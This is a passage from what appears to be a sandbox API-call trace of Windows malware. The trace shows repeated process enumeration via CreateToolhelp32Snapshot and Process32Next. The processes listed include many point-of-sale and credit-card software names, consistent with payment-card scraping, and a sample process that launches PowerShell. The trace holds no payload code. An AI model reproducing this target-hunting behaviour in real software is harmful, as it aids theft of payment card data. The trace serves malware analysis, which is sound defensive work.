dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0187.305] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0187.307] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0187.309] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0187.311] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0187.313] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0187.315] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0187.317] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0187.319] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0187.322] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0187.323] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0187.325] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0187.327] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0187.328] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0187.330] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0187.332] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0187.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0187.379] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0187.381] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0187.385] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0187.387] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0187.388] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.390] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.392] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0187.393] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.395] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.397] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0187.398] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0187.400] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0187.402] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0187.403] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0187.405] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.407] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0187.408] CloseHandle (hObject=0x17ec) returned 1 [0187.408] Sleep (dwMilliseconds=0x64) [0187.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0187.573] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.574] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.576] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.577] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.579] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.580] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.584] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.585] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.587] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.588] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.590] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.592] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.593] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.595] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.596] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.598] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.599] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.635] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.645] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.646] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.648] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.649] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.651] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.652] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.655] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.657] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.663] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0187.664] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0187.666] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.667] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.669] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.670] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.672] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0187.674] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.675] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.677] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.678] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0187.680] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0187.740] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0187.742] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0187.743] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0187.745] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0187.747] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0187.748] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0187.749] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0187.751] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0187.753] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0187.755] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0187.757] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0187.758] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 